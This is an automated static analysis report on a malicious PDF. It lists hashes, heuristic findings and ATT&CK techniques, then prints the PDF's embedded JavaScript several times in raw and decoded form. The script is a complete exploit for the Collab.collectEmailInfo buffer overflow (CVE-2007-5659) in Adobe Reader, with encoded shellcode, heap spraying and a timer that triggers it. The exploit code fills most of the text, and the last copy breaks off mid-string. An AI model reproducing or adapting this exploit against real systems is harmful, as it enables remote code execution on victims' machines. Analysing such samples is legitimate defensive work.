Malicious PDF — malware analysis report

Static analysis result for SHA-256 1e74d4f0feaf91a1…

MALICIOUS

PDF

485.1 KB Created: 2008-03-17 20:52:33 +08:00 Authoring application: PScript5.dll Version 5.2 (via Acrobat Distiller 7.0 (Windows)) First seen: 2026-05-09
MD5: aac6f2b92510851fd74ed86cdbba607a SHA-1: 96607b9873e3141911d426fceeee0a96f9b78dce SHA-256: 1e74d4f0feaf91a1fca01e7d6939a879bac7b95d1f20cada121a7efbbc08a4b5
260 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1204.002 Malicious File

The PDF file was flagged as malicious by an ML classifier with high confidence. It contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The embedded JavaScript stream, named 'javascript_obj0020_000.js', is the primary indicator of malicious activity. While the exact behavior of the script is not fully detailed, its presence within a malicious PDF strongly suggests it's designed to download and execute a second-stage payload. No specific malware family could be identified.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics 9

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (matched in decompressed stream)
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
      sc = unescape("%u9090%u9090%u9090%ueb90%u5e18%u5b56%u068a%u303c%u1474%u6b66%u58c0"+
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Embedded file low PDF_EMBEDDED
    PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
  • Object number defined twice with different bodies info PDF_DUPLICATE_OBJ_BODY_INCREMENTAL
    The same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, which is a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In PDF document text
    • http://ns.adobe.com/pdf/1.3/In PDF document text
    • http://ns.adobe.com/xap/1.0/In PDF document text
    • http://purl.org/dc/elements/1.1/In PDF document text
    • http://ns.adobe.com/xap/1.0/mm/In PDF document text

Extracted artifacts 6

Files carved from inside the sample during analysis.

FilenameKindSourceSize
2 pdf-embedded-file PDF EmbeddedFile object 1 at offset 0x72E 4088 bytes
SHA-256: 1d23761345727bb79d482d7c2af2ad3ae1d76ca173806f74b310636e062d7331
javascript_obj0020_000.js pdf-javascript-stream PDF /JS object 20 at offset 0x77DB4 9794 bytes
SHA-256: dfea41c6bb89441a7cf8b0be9ee9217debdfcb1d656c3973d8864f96af3f9b27
Preview script
First 1,000 lines of the extracted script
�� f u n c t i o n   r e ( c o u n t , w h a t )   
 
 { 
 
 v a r   v   =   " " ; 
 
 w h i l e   ( - - c o u n t   > =   0 )   
 
 v   + =   w h a t ; 
 
 r e t u r n   v ; 
 
 }   
 
 f u n c t i o n   s t a r t ( )   
 
 {     
 
     s c   =   u n e s c a p e ( " % u 9 0 9 0 % u 9 0 9 0 % u 9 0 9 0 % u e b 9 0 % u 5 e 1 8 % u 5 b 5 6 % u 0 6 8 a % u 3 0 3 c % u 1 4 7 4 % u 6 b 6 6 % u 5 8 c 0 " + 
 
 " % u 8 a 4 6 % u 3 2 2 6 % u 8 8 c 4 % u 4 3 0 3 % u e b 4 6 % u e 8 e b % u f f e 3 % u f f f f " + 
 
 " % u 5 0 4 8 % u 5 0 4 8 % u 5 0 4 8 % u 5 0 4 8 % u 5 9 4 2 % u 6 8 4 1 % u 5 9 4 1 % u 5 8 4 1 " + 
 
 " % u 5 8 4 1 % u 6 d 4 8 % u 5 8 4 3 % u 5 a 4 3 % u 5 8 4 2 % u 7 8 4 1 % u 5 8 4 1 % u 5 8 4 1 " + 
 
 " % u 5 8 4 1 % u 4 9 4 8 % u 6 7 4 4 % u 4 3 4 8 % u 7 4 4 2 % u 5 0 4 1 % u 4 3 4 8 % u 7 7 4 2 " + 
 
 " % u 6 4 4 4 % u 6 3 4 1 % u 4 1 4 2 % u 6 5 4 6 % u 5 4 4 5 % u 7 3 4 2 % u 6 b 4 1 % u 7 0 4 2 " + 
 
 " % u 6 c 4 3 % u 4 b 4 8 % u 4 8 4 3 % u 6 8 4 1 % u 4 b 4 8 % u 4 8 4 3 % u 5 4 4 1 % u 4 b 4 8 " + 
 
 " % u 7 8 4 3 % u 4 4 4 1 % u 6 d 4 8 % u 4 b 4 8 % u 4 8 4 3 % u 5 0 4 1 % u 5 3 4 5 % u 5 8 4 1 " + 
 
 " % u 7 3 4 2 % u 6 8 4 3 % u 4 b 4 8 % u 6 4 4 3 % u 4 4 4 4 % u 4 4 4 4 % u 4 b 4 8 % u 4 d 4 3 " + 
 
 " % u 6 4 4 1 % u 4 b 4 8 % u 4 4 4 6 % u 7 0 4 1 % u 7 0 4 3 % u 6 3 4 4 % u 6 5 4 2 % u 4 b 4 8 " + 
 
 " % u 4 2 4 3 % u 7 8 4 4 % u 4 b 4 8 % u 5 2 4 3 % u 7 8 4 1 % u 6 3 4 4 % u 6 d 4 2 % u 5 3 4 2 " + 
 
 " % u 6 c 4 1 % u 4 1 4 3 % u 4 b 4 8 % u 6 c 4 1 % u 4 b 4 8 % u 6 3 4 4 % u 4 5 4 2 % u 6 b 4 1 " + 
 
 " % u 4 f 4 2 % u 6 b 4 1 % u 7 0 4 2 % u 4 c 4 2 % u 6 c 4 8 % u 4 4 4 8 % u 7 0 4 2 % u 6 4 4 6 " + 
 
 " % u 6 7 4 4 % u 7 1 4 2 % u 7 7 4 5 % u 5 5 4 1 % u 6 3 4 4 % u 4 8 4 2 % u 5 3 4 5 % u 4 4 4 2 " + 
 
 " % u 6 3 4 1 % u 7 4 4 3 % u 4 4 4 4 % u 7 0 4 1 % u 6 5 4 6 % u 5 1 4 2 % u 4 b 4 8 % u 5 2 4 3 " + 
 
 " % u 4 4 4 4 % u 6 3 4 4 % u 6 d 4 2 % u 6 e 4 3 % u 4 b 4 8 % u 5 4 4 1 % u 4 3 4 3 % u 4 b 4 8 " + 
 
 " % u 5 2 4 3 % u 4 4 4 1 % u 6 3 4 4 % u 6 d 4 2 % u 4 b 4 8 % u 6 4 4 4 % u 4 b 4 8 % u 6 3 4 4 " + 
 
 " % u 7 5 4 2 % u 4 9 4 8 % u 4 c 4 3 % u 4 4 4 4 % u 4 4 4 1 % u 6 9 4 3 % u 7 3 4 2 % u 6 b 4 1 " + 
 
 " % u 7 9 4 2 % u 5 9 4 3 % u 4 d 4 8 % u 4 d 4 3 % u 5 a 4 3 % u 5 8 4 3 % u 7 8 4 6 % u 5 8 4 1 " + 
 
 " % u 6 4 4 4 % u 5 8 4 1 % u 5 8 4 1 % u 4 f 4 2 % u 6 5 4 6 % u 4 6 4 3 % u 4 f 4 2 % u 6 5 4 6 " + 
 
 " % u 6 6 4 1 % u 4 f 4 2 % u 4 5 4 6 % u 7 8 4 4 % u 6 b 4 1 % u 7 9 4 2 % u 6 e 4 3 % u 4 b 4 8 " + 
 
 " % u 4 5 4 3 % u 5 a 4 3 % u 4 b 4 8 % u 6 5 4 6 % u 4 6 4 3 % u 4 b 4 8 % u 4 e 4 2 % u 7 3 4 b " + 
 
 " % u 4 8 4 b % u 4 8 4 b % u 4 8 4 b % u 4 8 4 b % u 4 1 4 8 % u 7 3 4 2 % u 5 2 4 1 % u 5 2 4 1 " + 
 
 " % u 5 2 4 1 % u 5 2 4 1 % u 6 e 4 3 % u 7 1 4 2 % u 5 9 4 2 % u 5 a 4 1 % u 6 d 4 8 % u 6 b 4 1 " + 
 
 " % u 7 3 4 2 % u 6 b 4 8 % u 5 2 4 2 % u 4 a 4 2 % u 6 b 4 1 % u 7 9 4 2 % u 5 9 4 3 % u 4 d 4 8 " + 
 
 " % u 4 d 4 3 % u 4 6 4 6 % u 5 8 4 3 % u 4 f 4 2 % u 6 5 4 6 % u 5 a 4 3 % u 4 b 4 8 % u 4 5 4 6 " + 
 
 " % u 4 6 4 3 % u 5 a 4 3 % u 4 f 4 2 % u 6 5 4 6 % u 4 a 4 3 % u 4 f 4 2 % u 4 5 4 6 % u 4 4 4 1 " + 
 
 " % u 4 b 4 8 % u 4 5 4 6 % u 4 6 4 6 % u 7 1 4 1 % u 4 5 4 6 % u 5 2 4 3 % u 4 3 4 8 % u 7 5 4 3 " + 
 
 " % u 5 2 4 3 % u 5 8 4 1 % u 7 7 4 3 % u 6 b 4 8 % u 4 f 4 2 % u 6 5 4 6 % u 4 a 4 3 % u 4 f 4 2 " + 
 
 " % u 4 5 4 6 % u 6 4 4 4 % u 7 3 4 2 % u 7 6 4 3 % u 6 8 4 2 % u 5 2 4 2 % u 6 3 4 6 % u 4 b 4 2 " + 
 
 " % u 5 7 4 8 % u 4 d 4 2 % u 5 7 4 1 % u 6 b 4 1 % u 7 a 4 2 % u 4 a 4 8 % u 5 3 4 3 % u 4 7 4 3 " + 
 
 " % u 6 3 4 4 % u 7 7 4 2 % u 7 7 4 b % u 7 8 4 3 % u 6 3 4 6 % u 5 7 4 5 % u 6 e 4 1 % u 6 5 4 8 " + 
 
 " % u 4 f 4 1 % u 5 8 4 1 % u 7 4 4 3 % u 4 e 4 1 % u 6 d 4 3 % u 4 a 4 2 % u 4 8 4 1 % u 4 7 4 1 " + 
 
 " % u 7 1 4 3 % u 5 2 4 1 % u 5 8 4 2 % u 6 c 4 8 % u 5 0 4 1 % u 6 a 4 2 % u 6 6 4 6 % u 6 d 4 8 " + 
 
 " % u 5 3 4 b % u 7 5 4 3 % u 6 f 4 2 % u 5 8 4 8 % u 4 e 4 2 % u 4 a 4 8 % u 5 6 4 1 % u 5 4 4 5 " + 
 
 " % u 5 7 4 8 % u 6 3 4 4 % u 5 4 4 1 % u 7 8 4 1 % u 4 9 4 3 % u 6 b 4 3 % u 7 a 4 3 % u 6 7 4 3 " + 
 
 " % u 5 a 4 3 % u 6 c 4 3 % u 6 b 4 1 % u 6 a 4 1 % u 7 6 4 1 % u 6 d 4 3 % u 7 0 4 3 % u 6 d 4 3 " + 
 
 " % u 5 8 4 1 % u 5 8 4 1 % u 5 8 4 1 % u 5 8 4 1 % u 5 8 4 1 % u 5 8 4 1 % u 5 8 4 1 % u 5 8 4 1 " + 
 
 " % u 5 8 4 1 % u 6 a 4 8 % u 6 a 4 8 % u 6 a 4 8 % u 6 a 4 8 % u 5 8 4 1 % u 5 8 4 1 % u 5 8 4 1 " + 
 
 " % u 5 8 4 1 % u 5 8 4 1 % u 5 8 4 1 % u 5 8 4 1 % u 5 8 4 1 % u 5 8 4 1 % u 5 8 4 1 % u 5 8 4 1 " + 
 
 " % u 5 8 4 1 % u 5 8 4 1 % u 5 8 4 1 % u 5 8 4 1 % u 5 8 4 1 % u 5 8 4 1 % u 5 8 4 1 % u 5 8 4 1 " + 
 
 " % u 5 8 4 1 % u 5 8 4 2 % u 5 8 4 1 % u 5 8 4 1 % u 5 8 4 1 % u 5 8 4 1 % u 5 5 4 3 % u 4 1 4 8 " + 
 
 " % u 5 5 4 5 % u 6 b 4 3 % u 5 8 4 1 % u 5 8 4 1 % u 5 8 4 1 % u 5 8 4 2 % u 6 4 4 2 % u 4 e 4 2 " + 
 
 " % u 4 f 4 2 % u 4 f 4 2 % u 4 b 4 8 % u 6 8 4 5 % u 4 b 4 8 % u 4 5 4 2 % u 4 b 4 8 % u 4 e 4 2 " + 
 
 " % u 4 b 4 8 % u 7 6 4 5 % u 4 3 4 8 % u 7 1 4 2 % u 6 8 4 1 % u 5 8 4 2 % u 6 f 4 8 % u 4 e 4 2 " + 
 
 " % u 4 f 4 2 % u 4 f 4 2 % u 6 b 4 1 % u 7 9 4 2 % u 4 9 4 8 % u 4 5 4 3 % u 6 6 4 1 % u 4 3 4 8 " + 
 
 " % u 4 d 4 3 % u 6 6 4 1 % u 6 4 4 4 % u 6 b 4 1 % u 7 9 4 2 % u 5 9 4 3 % u 4 f 4 2 % u 6 5 4 6 " + 
 
 " % u 6 6 4 1 % u 4 f 4 2 % u 4 5 4 6 % u 4 4 4 4 % u 6 5 4 1 % u 5 8 4 1 % u 5 3 4 8 % u 6 7 4 4 " + 
 
 " % u 5 8 4 1 % u 7 a 4 3 % u 5 4 4 5 % u 6 5 4 1 % u 5 8 4 1 % u 5 6 4 8 % u 6 7 4 4 % u 5 8 4 1 " + 
 
 " % u 6 7 4 6 % u 5 5 4 2 % u 6 b 4 1 % u 7 9 4 2 % u 5 9 4 3 % u 5 9 4 3 % u 7 8 4 6 % u 4 8 4 3 " + 
 
 " % u 6 7 4 4 % u 5 8 4 1 % u 5 8 4 1 % u 4 f 4 2 % u 6 5 4 6 % u 6 6 4 1 % u 4 f 4 2 % u 4 5 4 6 " + 
 
 " % u 7 8 4 1 % u 6 b 4 1 % u 7 9 4 2 % u 5 9 4 3 % u 4 d 4 8 % u 4 d 4 3 % u 5 a 4 3 % u 5 8 4 3 " + 
 
 " % u 4 9 4 3 % u 7 1 4 2 % u 5 1 4 2 % u 5 a 4 1 % u 5 9 4 3 % u 4 d 4 8 % u 4 d 4 3 % u 4 e 4 3 " + 
 
 " % u 5 8 4 3 % u 4 f 4 2 % u 6 5 4 6 % u 6 6 4 1 % u 4 f 4 2 % u 4 5 4 6 % u 7 8 4 4 % u 6 b 4 1 " + 
 
 " % u 7 9 4 2 % u 5 9 4 3 % u 5 9 4 3 % u 7 8 4 6 % u 4 c 4 3 % u 6 7 4 4 % u 5 8 4 1 % u 5 8 4 1 " + 
 
 " % u 4 f 4 2 % u 6 5 4 6 % u 6 6 4 1 % u 4 f 4 2 % u 4 5 4 6 % u 7 8 4 1 % u 7 8 4 6 % u 4 f 4 2 " + 
 
 " % u 5 8 4 1 % u 5 8 4 1 % u 5 8 4 1 % u 6 2 4 3 % u 4 8 4 3 % u 4 f 4 2 % u 4 5 4 6 % u 7 4 4 1 " + 
 
 " % u 4 9 4 8 % u 4 d 4 3 % u 4 2 4 3 % u 5 8 4 3 % u 7 8 4 6 % u 4 f 4 2 % u 5 8 4 1 % u 5 8 4 1 " + 
 
 " % u 5 8 4 1 % u 4 f 4 2 % u 4 5 4 6 % u 5 0 4 1 % u 4 f 4 2 % u 6 5 4 6 % u 4 2 4 3 % u 4 f 4 2 " + 
 
 " % u 4 5 4 6 % u 5 4 4 1 % u 4 5 4 6 % u 6 b 4 1 % u 7 9 4 2 % u 5 9 4 3 % u 7 8 4 6 % u 4 8 4 b " + 
 
 " % u 5 8 4 1 % u 5 8 4 1 % u 5 8 4 1 % u 6 2 4 3 % u 5 a 4 1 % u 5 9 4 3 % u 4 9 4 3 % u 5 9 4 3 " + 
 
 " % u 7 8 4 6 % u 5 8 4 1 % u 5 8 4 1 % u 5 8 4 1 % u 4 8 4 3 % u 4 d 4 8 % u 4 d 4 3 % u 6 8 4 1 " + 
 
 " % u 5 8 4 3 % u 4 3 4 8 % u 4 d 4 3 % u 4 c 4 1 % u 6 5 4 4 % u 5 3 4 5 % u 5 2 4 1 % u 4 b 4 8 " + 
 
 " % u 4 5 4 2 % u 5 0 4 8 % u 5 0 4 8 % u 4 5 4 6 % u 4 b 4 8 % u 5 4 4 5 % u 4 f 4 2 % u 6 e 4 3 " + 
 
 " % u 4 c 4 1 % u 5 8 4 2 % u 4 1 4 2 % u 4 f 4 2 % u 4 f 4 2 % u 4 f 4 2 % u 5 5 4 3 % u 4 3 4 8 " + 
 
 " % u 4 8 4 2 % u 4 f 4 2 % u 6 5 4 6 % u 5 a 4 1 % u 5 3 4 5 % u 6 1 4 1 % u 4 9 4 8 % u 4 d 4 3 " + 
 
 " % u 4 a 4 3 % u 7 8 4 6 % u 5 8 4 1 % u 6 4 4 4 % u 5 8 4 1 % u 5 8 4 1 % u 6 2 4 3 % u 4 8 4 3 " + 
 
 " % u 4 f 4 2 % u 4 5 4 6 % u 7 4 4 1 % u 4 9 4 8 % u 4 d 4 3 % u 4 6 4 3 % u 4 b 4 8 % u 4 d 4 3 " + 
 
 " % u 4 e 4 3 % u 4 9 4 8 % u 4 d 4 3 % u 5 2 4 3 % u 5 8 4 2 % u 6 e 4 3 % u 4 e 4 2 % u 4 f 4 2 " + 
 
 " % u 4 f 4 2 % u 4 5 4 6 % u 6 b 4 1 % u 7 9 4 2 % u 5 9 4 3 % u 4 d 4 8 % u 4 d 4 3 % u 6 8 4 1 " + 
 
 " % u 5 8 4 3 % u 4 3 4 8 % u 4 d 4 3 % u 7 0 4 1 % u 6 5 4 4 % u 5 3 4 5 % u 5 2 4 1 % u 4 b 4 8 " + 
 
 " % u 4 5 4 2 % u 5 0 4 8 % u 5 0 4 8 % u 4 5 4 6 % u 4 b 4 8 % u 5 4 4 5 % u 4 f 4 2 % u 6 e 4 3 " + 
 
 " % u 7 0 4 1 % u 5 8 4 2 % u 4 1 4 2 % u 4 f 4 2 % u 4 f 4 2 % u 4 f 4 2 % u 5 5 4 3 % u 6 2 4 3 " + 
 
 " % u 5 8 4 1 % u 4 f 4 2 % u 4 5 4 6 % u 5 8 4 1 % u 5 0 4 8 % u 5 0 4 8 % u 5 0 4 8 % u 5 0 4 8 " + 
 
 " % u 3 0 3 0 " ) ; 
 
     
 
 i f   ( a p p . v i e w e r V e r s i o n   > =   7 . 0 ) 
 
 { 
 
         p l i n   =   r e ( 1 1 2 4 , u n e s c a p e ( " % u 0 b 0 b % u 0 0 2 8 % u 0 6 e b % u 0 6 e b " ) )   +   u n e s c a p e ( " % u 0 b 0 b % u 0 0 2 8 % u 0 a e b % u 0 a e b " )   +   u n e s c a p e ( " % u 9 0 9 0 % u 9 0 9 0 " )   +   r e ( 1 2 2 , u n e s c a p e ( " % u 0 b 0 b % u 0 0 2 8 % u 0 6 e b % u 0 6 e b " ) )   +   s c   +   r e ( 1 2 5 6 , u n e s c a p e ( " % u 4 1 4 1 % u 4 1 4 1 " ) ) ; 
 
 }   
 
 e l s e   
 
 { 
 
       e f 6   =     u n e s c a p e ( " % u f 6 e b % u f 6 e b " )   +   u n e s c a p e ( " % u 0 b 0 b % u 0 0 1 9 " ) ; 
 
       p l i n   =   r e ( 8 0 , u n e s c a p e ( " % u 9 0 9 0 % u 9 0 9 0 " ) )   +   s c   +   r e ( 8 0 , u n e s c a p e ( " % u 9 0 9 0 % u 9 0 9 0 " ) ) +   
 
                     u n e s c a p e ( " % u e 7 e 9 % u f f f 9 " ) + u n e s c a p e ( " % u f f f f % u f f f f " )   +   u n e s c a p e ( " % u f 6 e b % u f 4 e b " )   +   
 
                     u n e s c a p e ( " % u f 2 e b % u f 1 e b " ) ; 
 
       w h i l e   ( ( p l i n . l e n g t h   %   8 )   ! =   0 )   
 
               p l i n   =   u n e s c a p e ( " % u 4 1 4 1 " )   +   p l i n ; 
 
       p l i n   + =   r e ( 2 6 2 6 , e f 6 ) ; 
 
 } 
 
 i f   ( a p p . v i e w e r V e r s i o n   > =   6 . 0 ) 
 
 { 
 
         t h i s . c o l l a b S t o r e   =   C o l l a b . c o l l e c t E m a i l I n f o ( { s u b j :   " " , m s g :   p l i n } ) ; 
 
 } 
 
 } 
 
 / / s t a r t[�k� 
 
 v a r   s h a f t =   a p p . s e t T i m e O u t ( " s t a r t ( ) " , 1 2 0 0 ) ;
stream_004_off00077db4.js decompressed-pdf-stream PDF FlateDecoded stream at offset 0x77DB4 4900 bytes
SHA-256: 359a999055a456391681301e3b1c31d617f127bd28fc59b5e688c08d5de058a2
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 16 eval/decoder/string-building token(s).
generic_stage_recovery_000.js deobfuscated-js generic stage recovery null-collapse from JavaScript object 20 at offset 0x77DB4 4900 bytes
SHA-256: 855e38a0aca23d3a53ae2b1ee8d6393c915d035ddf6a5fb080303532e309dec5
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 16 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
��function re(count,what) 
{
var v = "";
while (--count >= 0) 
v += what;
return v;
} 
function start() 
{  
  sc = unescape("%u9090%u9090%u9090%ueb90%u5e18%u5b56%u068a%u303c%u1474%u6b66%u58c0"+
"%u8a46%u3226%u88c4%u4303%ueb46%ue8eb%uffe3%uffff"+
"%u5048%u5048%u5048%u5048%u5942%u6841%u5941%u5841"+
"%u5841%u6d48%u5843%u5a43%u5842%u7841%u5841%u5841"+
"%u5841%u4948%u6744%u4348%u7442%u5041%u4348%u7742"+
"%u6444%u6341%u4142%u6546%u5445%u7342%u6b41%u7042"+
"%u6c43%u4b48%u4843%u6841%u4b48%u4843%u5441%u4b48"+
"%u7843%u4441%u6d48%u4b48%u4843%u5041%u5345%u5841"+
"%u7342%u6843%u4b48%u6443%u4444%u4444%u4b48%u4d43"+
"%u6441%u4b48%u4446%u7041%u7043%u6344%u6542%u4b48"+
"%u4243%u7844%u4b48%u5243%u7841%u6344%u6d42%u5342"+
"%u6c41%u4143%u4b48%u6c41%u4b48%u6344%u4542%u6b41"+
"%u4f42%u6b41%u7042%u4c42%u6c48%u4448%u7042%u6446"+
"%u6744%u7142%u7745%u5541%u6344%u4842%u5345%u4442"+
"%u6341%u7443%u4444%u7041%u6546%u5142%u4b48%u5243"+
"%u4444%u6344%u6d42%u6e43%u4b48%u5441%u4343%u4b48"+
"%u5243%u4441%u6344%u6d42%u4b48%u6444%u4b48%u6344"+
"%u7542%u4948%u4c43%u4444%u4441%u6943%u7342%u6b41"+
"%u7942%u5943%u4d48%u4d43%u5a43%u5843%u7846%u5841"+
"%u6444%u5841%u5841%u4f42%u6546%u4643%u4f42%u6546"+
"%u6641%u4f42%u4546%u7844%u6b41%u7942%u6e43%u4b48"+
"%u4543%u5a43%u4b48%u6546%u4643%u4b48%u4e42%u734b"+
"%u484b%u484b%u484b%u484b%u4148%u7342%u5241%u5241"+
"%u5241%u5241%u6e43%u7142%u5942%u5a41%u6d48%u6b41"+
"%u7342%u6b48%u5242%u4a42%u6b41%u7942%u5943%u4d48"+
"%u4d43%u4646%u5843%u4f42%u6546%u5a43%u4b48%u4546"+
"%u4643%u5a43%u4f42%u6546%u4a43%u4f42%u4546%u4441"+
"%u4b48%u4546%u4646%u7141%u4546%u5243%u4348%u7543"+
"%u5243%u5841%u7743%u6b48%u4f42%u6546%u4a43%u4f42"+
"%u4546%u6444%u7342%u7643%u6842%u5242%u6346%u4b42"+
"%u5748%u4d42%u5741%u6b41%u7a42%u4a48%u5343%u4743"+
"%u6344%u7742%u774b%u7843%u6346%u5745%u6e41%u6548"+
"%u4f41%u5841%u7443%u4e41%u6d43%u4a42%u4841%u4741"+
"%u7143%u5241%u5842%u6c48%u5041%u6a42%u6646%u6d48"+
"%u534b%u7543%u6f42%u5848%u4e42%u4a48%u5641%u5445"+
"%u5748%u6344%u5441%u7841%u4943%u6b43%u7a43%u6743"+
"%u5a43%u6c43%u6b41%u6a41%u7641%u6d43%u7043%u6d43"+
"%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841"+
"%u5841%u6a48%u6a48%u6a48%u6a48%u5841%u5841%u5841"+
"%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841"+
"%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841"+
"%u5841%u5842%u5841%u5841%u5841%u5841%u5543%u4148"+
"%u5545%u6b43%u5841%u5841%u5841%u5842%u6442%u4e42"+
"%u4f42%u4f42%u4b48%u6845%u4b48%u4542%u4b48%u4e42"+
"%u4b48%u7645%u4348%u7142%u6841%u5842%u6f48%u4e42"+
"%u4f42%u4f42%u6b41%u7942%u4948%u4543%u6641%u4348"+
"%u4d43%u6641%u6444%u6b41%u7942%u5943%u4f42%u6546"+
"%u6641%u4f42%u4546%u4444%u6541%u5841%u5348%u6744"+
"%u5841%u7a43%u5445%u6541%u5841%u5648%u6744%u5841"+
"%u6746%u5542%u6b41%u7942%u5943%u5943%u7846%u4843"+
"%u6744%u5841%u5841%u4f42%u6546%u6641%u4f42%u4546"+
"%u7841%u6b41%u7942%u5943%u4d48%u4d43%u5a43%u5843"+
"%u4943%u7142%u5142%u5a41%u5943%u4d48%u4d43%u4e43"+
"%u5843%u4f42%u6546%u6641%u4f42%u4546%u7844%u6b41"+
"%u7942%u5943%u5943%u7846%u4c43%u6744%u5841%u5841"+
"%u4f42%u6546%u6641%u4f42%u4546%u7841%u7846%u4f42"+
"%u5841%u5841%u5841%u6243%u4843%u4f42%u4546%u7441"+
"%u4948%u4d43%u4243%u5843%u7846%u4f42%u5841%u5841"+
"%u5841%u4f42%u4546%u5041%u4f42%u6546%u4243%u4f42"+
"%u4546%u5441%u4546%u6b41%u7942%u5943%u7846%u484b"+
"%u5841%u5841%u5841%u6243%u5a41%u5943%u4943%u5943"+
"%u7846%u5841%u5841%u5841%u4843%u4d48%u4d43%u6841"+
"%u5843%u4348%u4d43%u4c41%u6544%u5345%u5241%u4b48"+
"%u4542%u5048%u5048%u4546%u4b48%u5445%u4f42%u6e43"+
"%u4c41%u5842%u4142%u4f42%u4f42%u4f42%u5543%u4348"+
"%u4842%u4f42%u6546%u5a41%u5345%u6141%u4948%u4d43"+
"%u4a43%u7846%u5841%u6444%u5841%u5841%u6243%u4843"+
"%u4f42%u4546%u7441%u4948%u4d43%u4643%u4b48%u4d43"+
"%u4e43%u4948%u4d43%u5243%u5842%u6e43%u4e42%u4f42"+
"%u4f42%u4546%u6b41%u7942%u5943%u4d48%u4d43%u6841"+
"%u5843%u4348%u4d43%u7041%u6544%u5345%u5241%u4b48"+
"%u4542%u5048%u5048%u4546%u4b48%u5445%u4f42%u6e43"+
"%u7041%u5842%u4142%u4f42%u4f42%u4f42%u5543%u6243"+
"%u5841%u4f42%u4546%u5841%u5048%u5048%u5048%u5048"+
"%u3030");
  
if (app.viewerVersion >= 7.0)
{
    plin = re(1124,unescape("%u0b0b%u0028%u06eb%u06eb")) + unescape("%u0b0b%u0028%u0aeb%u0aeb") + unescape("%u9090%u9090") + re(122,unescape("%u0b0b%u0028%u06eb%u06eb")) + sc + re(1256,unescape("%u4141%u4141"));
} 
else 
{
   ef6 =  unescape("%uf6eb%uf6eb") + unescape("%u0b0b%u0019");
   plin = re(80,unescape("%u9090%u9090")) + sc + re(80,unescape("%u9090%u9090"))+ 
          unescape("%ue7e9%ufff9")+unescape("%uffff%uffff") + unescape("%uf6eb%uf4eb") + 
          unescape("%uf2eb%uf1eb");
   while ((plin.length % 8) != 0) 
       plin = unescape("%u4141") + plin;
   plin += re(2626,ef6);
}
if (app.viewerVersion >= 6.0)
{
    this.collabStore = Collab.collectEmailInfo({subj: "",msg: plin});
}
}
//start[�k�
var shaft= app.setTimeOut("start()",1200);
generic_stage_recovery_001.js deobfuscated-js generic stage recovery split-literal-normalize from decompressed stream at 0x77DB4 at offset 0x77DB4 4540 bytes
SHA-256: 5bfe4ffa20f9c99c4a38429aaa4226be1a40dd790b00956d8b08fc85f5e757fa
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 16 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function re(count,what) 
{
var v = "";
while (--count >= 0) 
v += what;
return v;
} 
function start() 
{  
  sc = unescape("%u9090%u9090%u9090%ueb90%u5e18%u5b56%u068a%u303c%u1474%u6b66%u58c0%u8a46%u3226%u88c4%u4303%ueb46%ue8eb%uffe3%uffff%u5048%u5048%u5048%u5048%u5942%u6841%u5941%u5841%u5841%u6d48%u5843%u5a43%u5842%u7841%u5841%u5841%u5841%u4948%u6744%u4348%u7442%u5041%u4348%u7742%u6444%u6341%u4142%u6546%u5445%u7342%u6b41%u7042%u6c43%u4b48%u4843%u6841%u4b48%u4843%u5441%u4b48%u7843%u4441%u6d48%u4b48%u4843%u5041%u5345%u5841%u7342%u6843%u4b48%u6443%u4444%u4444%u4b48%u4d43%u6441%u4b48%u4446%u7041%u7043%u6344%u6542%u4b48%u4243%u7844%u4b48%u5243%u7841%u6344%u6d42%u5342%u6c41%u4143%u4b48%u6c41%u4b48%u6344%u4542%u6b41%u4f42%u6b41%u7042%u4c42%u6c48%u4448%u7042%u6446%u6744%u7142%u7745%u5541%u6344%u4842%u5345%u4442%u6341%u7443%u4444%u7041%u6546%u5142%u4b48%u5243%u4444%u6344%u6d42%u6e43%u4b48%u5441%u4343%u4b48%u5243%u4441%u6344%u6d42%u4b48%u6444%u4b48%u6344%u7542%u4948%u4c43%u4444%u4441%u6943%u7342%u6b41%u7942%u5943%u4d48%u4d43%u5a43%u5843%u7846%u58